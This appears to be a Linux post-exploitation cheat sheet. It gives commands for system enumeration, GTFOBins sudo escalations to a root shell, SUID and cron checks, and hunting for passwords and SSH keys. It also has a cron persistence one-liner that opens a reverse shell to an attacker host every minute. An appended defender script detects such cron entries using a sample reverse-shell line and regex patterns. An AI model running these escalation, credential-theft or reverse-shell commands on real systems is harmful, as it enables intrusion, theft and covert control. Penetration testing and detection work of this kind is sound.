Linux Post-Exploitation
Basic Enumeration
| Command | Description |
|---|---|
| whoami | Current user. |
| id | User ID, group ID, and supplementary groups. |
| hostname | System hostname. |
| uname -a | Kernel version and architecture. |
| cat /etc/os-release | OS distribution and version. |
| cat /etc/passwd | List all system users. |
| cat /etc/shadow | Password hashes (requires root). |
| ls /home | List home directories. |
| ss -tulnp | Listening ports and services. |
| netstat -antp | Active connections and listening ports. |
| ifconfig / ip a | Network interfaces and IPs. |
| arp -a | ARP table - discover other hosts on the network. |
| route -n / ip route | Routing table. |
| env | Environment variables (may contain credentials). |
| history | Command history (may reveal credentials). |
| cat ~/.bash_history | Bash history file. |
Privilege Escalation - sudo
| Command | Description |
|---|---|
| sudo -l | List commands the current user can run as root. |
| sudo -u root <command> | Run a specific command as root. |
GTFOBins - Common sudo Escalations
| Binary | Command to get root shell |
|---|---|
| find | sudo find . -exec /bin/bash \; -quit |
| vim | sudo vim -c ':!/bin/bash' |
| python | sudo python -c 'import os; os.execl("/bin/bash", "bash", "-p")' |
| python3 | sudo python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")' |
| less | sudo less /etc/passwd then !/bin/bash |
| more | sudo more /etc/passwd then !/bin/bash |
| awk | sudo awk 'BEGIN {system("/bin/bash")}' |
| nmap | sudo nmap --interactive then !sh |
| perl | sudo perl -e 'exec "/bin/bash";' |
| ruby | sudo ruby -e 'exec "/bin/bash"' |
Privilege Escalation - SUID Binaries
| Command | Description |
|---|---|
| find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null | Find all SUID binaries. |
| find / -perm -u=s -type f 2>/dev/null | Alternative SUID search. |
Check found binaries on GTFOBins for SUID exploitation techniques.
Privilege Escalation - Writable Files & Cron
| Command | Description |
|---|---|
| cat /etc/crontab | System-wide cron jobs. |
| ls -la /etc/cron.* | Cron directories (daily, hourly, weekly). |
| find / -path /proc -prune -o -type f -perm -o+w -print 2>/dev/null | World-writable files. |
| ./pspy64 | Monitor running processes without root (detect cron jobs). |
Credential Hunting
| Command | Description |
|---|---|
| find / -name "*.conf" -o -name "*.config" -o -name "settings.php" 2>/dev/null | Find configuration files. |
| find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null | Broader config file search. |
| grep -r "password" /var/www/ 2>/dev/null | Search for passwords in web files. |
| cat /var/www/html/*/sites/default/settings.php | Drupal database credentials. |
| cat /var/www/html/wordpress/wp-config.php | WordPress database credentials. |
| find / -name "id_rsa" 2>/dev/null | Find SSH private keys. |
| find / -name "*.bak" -o -name "*.old" 2>/dev/null | Backup files that may contain credentials. |
Persistence - Linux Cron
# Add a cron job that runs a reverse shell every minute
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<kali_IP>/<port> 0>&1'") | crontab -
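A defender-side check, added here as an example and not part of the original notes: it scans crontab text for the shape of the cron reverse-shell entry above and for the same places the enumeration table looks (system crontab, cron.* directories, per-user crontabs). The sample crontab, the 192.0.2.10 address and the function names are constructed for the example.

```sh
#!/bin/sh
# Constructed sample crontab (not a real capture): two ordinary jobs plus one
# line shaped like the every-minute reverse-shell persistence entry above.
SAMPLE_CRONTAB=$(cat <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh >/var/log/backup.log 2>&1
*/15 * * * * /usr/bin/certbot renew --quiet
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'
EOF
)

# Heuristics that rarely belong in a legitimate cron entry: bash's /dev/tcp
# or /dev/udp pseudo-device, an interactive shell with redirected stdio,
# netcat with -e, or a job scheduled every minute. Extended regex, matched
# case-insensitively; the every-minute rule is the noisiest and may need tuning.
SUSPICIOUS_RE='/dev/(tcp|udp)/|bash -i|sh -i|nc .*-e|>& */dev/|^\* \* \* \* \*'

# flag_cron_lines: read crontab text on stdin, print suspicious non-comment
# lines prefixed with their line number. Exit status is 0 when anything matched.
flag_cron_lines() {
    grep -n -i -E "$SUSPICIOUS_RE" | grep -v -E '^[0-9]+:[[:space:]]*#'
}

# count_flagged: number of suspicious lines in the crontab text passed as $1.
count_flagged() {
    printf '%s\n' "$1" | flag_cron_lines | wc -l | tr -d ' '
}

# audit_host: run the check over the live system. Reading other users'
# crontabs with crontab -l -u requires root; unreadable ones are skipped.
audit_host() {
    for f in /etc/crontab /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/*; do
        [ -f "$f" ] && flag_cron_lines < "$f" | sed "s|^|$f:|"
    done
    for u in $(cut -d: -f1 /etc/passwd); do
        crontab -l -u "$u" 2>/dev/null | flag_cron_lines | sed "s|^|crontab($u):|"
    done
}

# Demonstration on the constructed sample: only the reverse-shell line is printed.
printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines
```

Run `audit_host` as root to sweep a real machine; pair the output with the pspy64 observation above, since a job that has already fired shows up as a process even if its crontab entry was removed afterwards.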